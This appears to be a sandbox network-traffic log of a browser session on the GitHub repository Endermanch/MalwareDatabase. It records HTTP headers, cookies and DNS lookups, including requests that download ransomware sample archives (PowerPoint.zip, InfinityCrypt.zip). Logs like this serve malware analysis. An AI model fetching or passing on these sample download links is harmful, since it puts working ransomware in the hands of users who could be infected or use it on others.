sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:50:49 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"5c4424d67438b86886f7ea03d22fb00f"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 1922
x-github-request-id: D306:3F8625:7F38CA:88C489:66426F18
-
GEThttps://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/PowerPoint.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares/PowerPoint.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:50:49 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"e61453a6d8b82727dfe87839b3fc469c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 177
x-github-request-id: D306:3F8625:7F38EF:88C4B7:66426F19
-
GEThttps://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/PowerPoint.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/PowerPoint.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:50:49 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"89eeb5d22396cca98a822021a79ada27"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 457
x-github-request-id: D306:3F8625:7F38EF:88C4B5:66426F19
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/raw/master/ransomwares/PowerPoint.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 302
date: Mon, 13 May 2024 19:50:52 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PowerPoint.zip
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: D306:3F8625:7F3A65:88C64E:66426F19
-
Remote address:8.8.8.8:53Requestapi.github.comIN AResponseapi.github.comIN A20.26.156.210
-
Remote address:8.8.8.8:53Requestapi.github.comIN AResponseapi.github.comIN A20.26.156.210
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 325
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:50:49 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1715633449
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D36F:275B2A:55C7574:58563AF:66426F19
-
190 B 132 B 4 3
-
908 B 1.2kB 10 8
HTTP Request
GET http://malwarewatch.org/HTTP Response
301 -
19.5kB 514.2kB 348 427
HTTP Request
GET https://malwarewatch.org/HTTP Response
200HTTP Request
GET https://malwarewatch.org/styles/styles.cssHTTP Response
200HTTP Request
GET https://malwarewatch.org/scripts/videoList.jsHTTP Response
200HTTP Request
GET https://malwarewatch.org/scripts/sideBar.jsHTTP Response
200HTTP Request
GET https://malwarewatch.org/images/logo.pngHTTP Response
200HTTP Request
GET https://malwarewatch.org/images/icons/software.pngHTTP Request
GET https://malwarewatch.org/images/icons/library.pngHTTP Request
GET https://malwarewatch.org/images/icons/defrag.pngHTTP Request
GET https://malwarewatch.org/images/icons/config.pngHTTP Request
GET https://malwarewatch.org/images/icons/help.pngHTTP Request
GET https://malwarewatch.org/images/icons/users.pngHTTP Request
GET https://malwarewatch.org/images/icons/youtube.pngHTTP Request
GET https://malwarewatch.org/images/icons/twitter.pngHTTP Request
GET https://malwarewatch.org/images/icons/steam.pngHTTP Request
GET https://malwarewatch.org/images/backgrounds/background.jpgHTTP Request
GET https://malwarewatch.org/images/assets/video_feed/peek.pngHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://malwarewatch.org/video_list.htmlHTTP Request
GET https://malwarewatch.org/andrew_video_list.htmlHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://malwarewatch.org/images/favicon.ico?v=1.1HTTP Response
200HTTP Request
GET https://malwarewatch.org/malwareHTTP Response
301HTTP Request
GET https://malwarewatch.org/malwareHTTP Response
301 -
2.3kB 19.1kB 27 31
HTTP Request
GET https://unpkg.com/turbolinks@5.2.0/dist/turbolinks.jsHTTP Response
200 -
2.2kB 17.2kB 25 26
HTTP Request
GET https://use.fontawesome.com/releases/v5.15.2/css/all.cssHTTP Response
200 -
4.7kB 99.7kB 74 86
HTTP Request
GET https://www.youtube.com/embed/TUzn_Qo3B3YHTTP Request
GET https://www.youtube.com/s/player/a960a0cb/www-player.css -
999 B 6.2kB 9 8
-
999 B 6.2kB 9 8
-
999 B 6.2kB 9 8
-
999 B 6.2kB 9 8
-
16.1kB 674.5kB 316 496
HTTP Request
GET https://i.ytimg.com/vi/Ia1dvQz-tU4/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/tUMow68hha0/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/asvb0jFI01A/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/A9W6LFKNCLU/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/tKtmzLpZ3RQ/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/_7UjgXM3lFs/maxresdefault.jpg -
999 B 6.2kB 9 8
-
1.9kB 7.1kB 18 19
HTTP Request
GET https://googleads.g.doubleclick.net/pagead/id -
1.9kB 7.0kB 18 17
HTTP Request
GET https://static.doubleclick.net/instream/ad_status.js -
216.58.214.170:443https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Createtls, http2msedge.exe2.0kB 7.1kB 18 19
HTTP Request
OPTIONS https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create -
142.250.178.132:443https://www.google.com/js/th/4FCBsbVWt5jZVKm36Bs_QtpgBkunTUSSklJnPgMburg.jstls, http2msedge.exe2.6kB 28.3kB 32 32
HTTP Request
GET https://www.google.com/js/th/4FCBsbVWt5jZVKm36Bs_QtpgBkunTUSSklJnPgMburg.js -
142.250.179.97:443https://yt3.ggpht.com/S_--VnJzquEW-dq6nRUnBIFxErUGXYScvvTgjxKHk4F38KSSSk5sculuXWDgU-b-39nm82X6Zw=s68-c-k-c0x00ffffff-no-rjtls, http2msedge.exe2.2kB 15.3kB 21 24
HTTP Request
GET https://yt3.ggpht.com/S_--VnJzquEW-dq6nRUnBIFxErUGXYScvvTgjxKHk4F38KSSSk5sculuXWDgU-b-39nm82X6Zw=s68-c-k-c0x00ffffff-no-rj -
204.79.197.237:443https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GfUyV2_4IlfS5mO1-GoXFDVUCUz5Np7mDwAWn2ZX1Syuo5d2xAV1KeuXQI5sypdrqn0Apy_wHJ2CymNHdaWIuBcXpy8gDjzhS8lJJVsPeL3JH1hpPCK5sTD-7PqsvDG0n7ZiBIydgkUYBFe8pyJ0cCjP8L07UwETvwetbihAHkgi0YhD%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dc128350ffede14b752cf5324570fd7ab&TIME=20240426T131944Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0Etls, http22.5kB 9.0kB 20 17
HTTP Request
GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GfUyV2_4IlfS5mO1-GoXFDVUCUz5Np7mDwAWn2ZX1Syuo5d2xAV1KeuXQI5sypdrqn0Apy_wHJ2CymNHdaWIuBcXpy8gDjzhS8lJJVsPeL3JH1hpPCK5sTD-7PqsvDG0n7ZiBIydgkUYBFe8pyJ0cCjP8L07UwETvwetbihAHkgi0YhD%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dc128350ffede14b752cf5324570fd7ab&TIME=20240426T131944Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0EHTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GfUyV2_4IlfS5mO1-GoXFDVUCUz5Np7mDwAWn2ZX1Syuo5d2xAV1KeuXQI5sypdrqn0Apy_wHJ2CymNHdaWIuBcXpy8gDjzhS8lJJVsPeL3JH1hpPCK5sTD-7PqsvDG0n7ZiBIydgkUYBFe8pyJ0cCjP8L07UwETvwetbihAHkgi0YhD%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dc128350ffede14b752cf5324570fd7ab&TIME=20240426T131944Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0EHTTP Response
204 -
23.62.61.170:443https://www.bing.com/aes/c.gif?RG=eaacba607e8d4fffae645607ced413e3&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131944Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893tls, http21.4kB 5.3kB 16 11
HTTP Request
GET https://www.bing.com/aes/c.gif?RG=eaacba607e8d4fffae645607ced413e3&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131944Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893HTTP Response
200 -
23.62.61.170:443https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90tls, http21.6kB 6.4kB 16 12
HTTP Request
GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90HTTP Response
200 -
46 B 1
-
3.8kB 104.1kB 59 85
HTTP Request
OPTIONS https://github.com/Endermanch/MalwareDatabaseHTTP Response
404 -
20.26.156.215:443https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.ziptls, http2msedge.exe9.4kB 202.3kB 117 192
HTTP Request
GET https://github.com/Endermanch/MalwareDatabaseHTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/security/overall-countHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/spoofed_commit_check/18497187aa0dc5af76852a256cd0a3fceb7c4ab9HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=masterHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/used_by_listHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/refs?type=branchHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/latest-commit/masterHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/masterHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/branch-countHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tag-countHTTP Response
200HTTP Request
GET https://github.com/opensearch.xmlHTTP Response
204HTTP Request
GET https://github.com/manifest.jsonHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
